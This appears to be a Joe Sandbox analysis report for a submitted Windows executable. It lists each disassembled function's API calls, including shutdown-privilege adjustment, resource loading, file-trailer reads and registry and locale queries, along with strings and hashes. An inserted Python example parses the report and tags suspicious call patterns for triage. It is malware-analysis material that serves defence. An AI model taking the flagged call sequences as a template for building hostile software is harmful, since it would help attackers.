                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 1263568516-0
                                                                                                    • Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                                    • Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
                                                                                                    • Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                                    • Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(00000028), ref: 00409457
                                                                                                    • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
                                                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 0040949D
                                                                                                    • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004094A2
                                                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                    • API String ID: 107509674-3733053543
                                                                                                    • Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                                    • Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
                                                                                                    • Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                                    • Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F
                                                                                                    APIs
                                                                                                    • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409C3E
                                                                                                    • SizeofResource.KERNEL32(00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 00409C51
                                                                                                    • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000), ref: 00409C63
                                                                                                    • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92), ref: 00409C74
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                    • String ID:
                                                                                                    • API String ID: 3473537107-0
                                                                                                    • Opcode ID: 66472a43d98f2116202d14454299061058d21427157a3f4f4112e001326967e1
                                                                                                    • Instruction ID: 5c2a5118689e511edc0a9dde7e1b9e77d0383d271af581b44440e1e73e890ea9
                                                                                                    • Opcode Fuzzy Hash: 66472a43d98f2116202d14454299061058d21427157a3f4f4112e001326967e1
                                                                                                    • Instruction Fuzzy Hash: B0E07E80B8874726FA6576FB08C7B6B008C4BA570EF00003BB700792C3DDBC8C04462E
                                                                                                    APIs
                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoLocale
                                                                                                    • String ID:
                                                                                                    • API String ID: 2299586839-0
                                                                                                    • Opcode ID: b79b605a6dbd2dbd76dc5df923bc970e8acc9169766131cf64cabc826e101d13
                                                                                                    • Instruction ID: 1db3d1c1bb6fab5f91442dea8a08a829cd161d84d3a7e1f0c2fe21aaaafd944f
                                                                                                    • Opcode Fuzzy Hash: b79b605a6dbd2dbd76dc5df923bc970e8acc9169766131cf64cabc826e101d13
                                                                                                    • Instruction Fuzzy Hash: 9ED02EA230E2006AE210808B2C84EBB4A9CCEC53A0F00007FF648C3242D2208C029B76
                                                                                                    APIs
                                                                                                    • GetSystemTime.KERNEL32(?), ref: 004026CE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: SystemTime
                                                                                                    • String ID:
                                                                                                    • API String ID: 2656138-0
                                                                                                    • Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                                    • Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
                                                                                                    • Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                                    • Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
                                                                                                    APIs
                                                                                                    • GetVersionExA.KERNEL32(?,004065F0,00000000,004065FE,?,?,?,?,?,0040A622), ref: 00405D02
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                     • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Version
                                                                                                    • String ID:
                                                                                                    • API String ID: 1889659487-0
                                                                                                    • Opcode ID: 804cda8d473c4c61bcc63f12479ba9190822d5c554409fc9a119c77cb0a2aa37
                                                                                                    • Instruction ID: 4c33b40dd65743d8d98a5ffd827b1eb297e5dd4f71424004bfe2d5ab9b26ea54
                                                                                                    • Opcode Fuzzy Hash: 804cda8d473c4c61bcc63f12479ba9190822d5c554409fc9a119c77cb0a2aa37
                                                                                                    • Instruction Fuzzy Hash: 00C0126040070186D7109B31DC02B1672D4AB44310F4405396DA4963C2E73C80018A6E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                     • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4d767100099eb102bdc21c19fdb755dbde7929e86d9821f584b3da527505dd0e
                                                                                                    • Instruction ID: 7dc6dc86846b3232beed044054ddb30c9891ac2fec336679fba6e94018ae2b4c
                                                                                                    • Opcode Fuzzy Hash: 4d767100099eb102bdc21c19fdb755dbde7929e86d9821f584b3da527505dd0e
                                                                                                    • Instruction Fuzzy Hash: C032D775E00219DFCB14CF99CA80AADB7B2BF88314F24816AD855B7385DB34AE42CF55
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 0040704D
                                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                                                                    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 004070A1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                     • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressCloseHandleModuleProc
                                                                                                    • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                                    • API String ID: 4190037839-2401316094
                                                                                                    • Opcode ID: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
                                                                                                    • Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
                                                                                                    • Opcode Fuzzy Hash: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
                                                                                                    • Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
                                                                                                    APIs
                                                                                                    • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                                                    • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                                                    • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                                                    • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                                                    • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                                                    • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                                                    • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                                                    • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                     • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                                    • String ID:
                                                                                                    • API String ID: 1694776339-0
                                                                                                    • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                                    • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                                                                    • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                                    • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                                                                    APIs
                                                                                                    • GetSystemDefaultLCID.KERNEL32(00000000,0040560C,?,?,?,?,00000000,00000000,00000000,?,004065EB,00000000,004065FE), ref: 004053DE
                                                                                                      • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                                      • Part of subcall function 00405258: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                     • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoLocale$DefaultSystem
                                                                                                    • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                                    • API String ID: 1044490935-665933166
                                                                                                    • Opcode ID: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
                                                                                                    • Instruction ID: cc137df54ae1fcbb63b87987e69a719e9c27c4b31815d0debc5c9b1d2781c89a
                                                                                                    • Opcode Fuzzy Hash: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
                                                                                                    • Instruction Fuzzy Hash: F8515374B00548ABDB00EBA59891A5F7769DB88304F50D5BBB515BB3C6CA3DCA058F1C
                                                                                                    APIs
                                                                                                    • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                                                    • LocalFree.KERNEL32(007DA580,00000000,00401AB4), ref: 00401A1B
                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000,007DA580,00000000,00401AB4), ref: 00401A3A
                                                                                                    • LocalFree.KERNEL32(007DB580,?,00000000,00008000,007DA580,00000000,00401AB4), ref: 00401A79
                                                                                                    • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                                                    • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                     • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 3782394904-0
                                                                                                    • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                                    • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                                                                    • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                                    • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                                                                    APIs
                                                                                                    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                                                    • ExitProcess.KERNEL32 ref: 00403DE5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                     • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExitMessageProcess
                                                                                                    • String ID: Error$Runtime error at 00000000$9@
                                                                                                    • API String ID: 1220098344-1503883590
                                                                                                    • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                                    • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                                                                    • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                                    • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
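                                                                                                     The function blocks on this page all share one layout: an APIs list whose lines carry the call, its module, the argument dump and a `ref:` address (with indented "Part of subcall function" lines for callees), then a Similarity section whose String ID joins the referenced strings with `$`. The Python below is an added example, not Joe Sandbox code and not part of this report: it parses blocks in that layout into records and tags the call patterns seen above that an analyst checks first (GetProcAddress resolution, registry access, a negative SetFilePointer followed by ReadFile, SetEndOfFile, locale queries, MessageBoxA followed by ExitProcess). The embedded excerpt is constructed from lines on this page with argument lists shortened; the tag names and triage rules are this example's own choices, not report fields.

```python
import re
from collections import namedtuple
from dataclasses import dataclass, field

# Constructed excerpt in the report's own layout (lines copied from this page,
# argument lists shortened). Raw string: the String ID backslashes are literal.
SAMPLE_REPORT = r"""
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129), ref: 0040704D
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
• RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll), ref: 004070A1
Similarity
• API ID: AddressCloseHandleModuleProc
• String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
• Opcode ID: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
• Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
APIs
• CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
• SetFilePointer.KERNEL32(?,-00000080,00000000,00000000), ref: 00403B5E
• ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000), ref: 00403B7F
• SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
• SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
Similarity
• String ID:
• Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
• Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
APIs
• MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
• ExitProcess.KERNEL32 ref: 00403DE5
Similarity
• String ID: Error$Runtime error at 00000000$9@
• Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
• Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
APIs
• GetSystemDefaultLCID.KERNEL32(00000000,0040560C), ref: 004053DE
  • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100), ref: 0040522A
Similarity
• String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
• Opcode ID: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
• Instruction Fuzzy Hash: F8515374B00548ABDB00EBA59891A5F7769DB88304F50D5BBB515BB3C6CA3DCA058F1C
"""

# subcall_of holds the address from a "Part of subcall function" line, else None
ApiCall = namedtuple("ApiCall", "name module args ref subcall_of")

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)   # the "$"-separated String ID
    fields: dict = field(default_factory=dict)    # Opcode ID, Instruction Fuzzy Hash, ...

API_RE = re.compile(r"^•\s*(?:Part of subcall function ([0-9A-Fa-f]{8}):\s*)?"
                    r"(\w+)\.(\w+)(?:\((.*)\),)?\s*ref:\s*([0-9A-Fa-f]{8})$")
FIELD_RE = re.compile(r"^•\s*([A-Za-z ]+?):\s*(.*)$")

def parse_report(text):
    """One FunctionRecord per block; a block ends at its Instruction Fuzzy Hash line."""
    records, cur = [], FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip()                      # subcall lines are indented
        m = API_RE.match(line)
        if m:
            sub, name, mod, args, ref = m.groups()
            cur.apis.append(ApiCall(name, mod, args.split(",") if args else [], ref, sub))
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue                            # section headers such as "APIs"
        key, value = m.group(1), m.group(2).strip()
        if key == "String ID":
            cur.strings = [s for s in value.split("$") if s]
        else:
            cur.fields[key] = value
        if key == "Instruction Fuzzy Hash":
            records.append(cur)
            cur = FunctionRecord()
    return records

def triage(rec):
    """Tag API patterns worth a first look; the tags and rules are this example's own."""
    tags, names = set(), [a.name for a in rec.apis]
    if any(n in ("GetProcAddress", "LoadLibraryA", "LoadLibraryW") for n in names):
        tags.add("dynamic_api_resolution")
    if any(n.startswith("Reg") for n in names):
        tags.add("registry_access")
    if "SetEndOfFile" in names:
        tags.add("file_truncate")
    for i, a in enumerate(rec.apis):            # negative seek, then a read: trailer access
        if a.name == "SetFilePointer" and len(a.args) > 1 and a.args[1].startswith("-"):
            if any(b.name == "ReadFile" for b in rec.apis[i + 1:]):
                tags.add("file_tail_read")
    if any(n.startswith("GetLocaleInfo") or n == "GetSystemDefaultLCID" for n in names):
        tags.add("locale_probe")
    if "MessageBoxA" in names and "ExitProcess" in names:
        tags.add("abort_dialog")
    return tags

if __name__ == "__main__":
    for r in parse_report(SAMPLE_REPORT):
        print(r.fields["Opcode ID"][:16], sorted(triage(r)))
```

                                                                                                     Because a block is closed on its Instruction Fuzzy Hash line rather than opened on an APIs header, a function with no APIs section (such as the block above whose API ID is empty) still produces a record. The Opcode ID is kept in `fields` so that records from two reports can be joined on it; the `ref:` addresses stay attached to each call for jumping back into the dump.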
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                                                    • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                                                    • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                     • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$AllocString
                                                                                                    • String ID:
                                                                                                    • API String ID: 262959230-0
                                                                                                    • Opcode ID: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
                                                                                                    • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                                                    • Opcode Fuzzy Hash: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
                                                                                                    • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(00000000,0040A60E), ref: 004030E3
                                                                                                    • GetCommandLineA.KERNEL32(00000000,0040A60E), ref: 004030EE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                     • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                     • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CommandHandleLineModule
                                                                                                    • String ID: H%|$U1hd.@
                                                                                                    • API String ID: 2123368496-2448479167
                                                                                                    • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                                    • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                                                    • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                                    • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                                                    APIs
                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,00409918,00000000), ref: 00406E4C
                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
